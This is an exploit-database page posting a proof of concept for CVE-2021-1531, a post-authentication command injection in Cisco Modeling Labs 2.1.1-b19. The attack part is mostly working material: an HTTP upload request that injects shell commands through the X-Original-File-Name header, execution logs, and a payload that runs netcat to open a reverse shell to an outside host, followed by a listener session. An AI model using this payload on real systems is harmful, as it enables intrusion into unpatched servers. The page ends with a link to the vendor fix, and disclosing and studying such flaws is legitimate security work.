0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Cisco Modeling Labs 2.1.1-b19 Remote Command Execution Exploit
Author
Risk
![](/img/risk/critlow_4.gif)
Security Risk Critical
]0day-ID
Category
Date add
CVE
Platform
Cisco Modeling Labs 2.1.1-b19 Post-Auth RCE Vulnerability CVE-2021-1531 ======= Details ======= Authenticated command injection in the web portal via the X-Original-File-Name header. Tested with portal 'admin' user who does not have a system login or SSH access, but likely works for any user who can upload files in the portal. ===== Repro ===== ------- Request ------- POST /api/v0/images/upload HTTP/1.1 Host: 10.10.10.118 X-Original-File-Name: test.rpm';id>/tmp/123' Authorization: Bearer [jwt token] Content-Length: 0 -------- Response -------- HTTP/1.1 200 OK Server: nginx/1.14.1 ... "Success" ---------------- Local monitoring ---------------- pid=5547 executed [/bin/sh -c /usr/local/bin/imagetool -stderrthreshold=INFO -multipart move '/var/local/virl2/nginx-temp-folder/0063443599' '/var/local/virl2/dropfolder/test.rpm';id>/tmp/123''; exit 0 ] ..... pid=5555 executed [id ] $ cat /tmp/123 uid=982(virl2) gid=980(virl2) groups=980(virl2),982(wireshark),986(libvirt) context=system_u:system_r:unconfined_service_t:s0 ============ Exploitation ============ The netcat binary with -e support is installed on the system, which makes gaining a remote shell as the virl2 user easy for demo. ------- Payload ------- X-Original-File-Name: test.rpm';nc 10.1.1.101 5000 -e /bin/bash' -------- Listener -------- $ nc -l -p 5000 ..... *connection received from cml2* /usr/libexec/platform-python -c 'import pty; pty.spawn("/bin/bash")' *** VIRL2 network simulator monitor *** CLI> uname -a Linux cml2-controller.cml.lab 4.18.0-80.11.2.el8_0.x86_64 #1 SMP Tue Sep 24 11:32:19 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux CLI> pwd /var/local/virl2 === Fix === https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cml-cmd-inject-N4VYeQXB # 0day.today [2024-07-01] #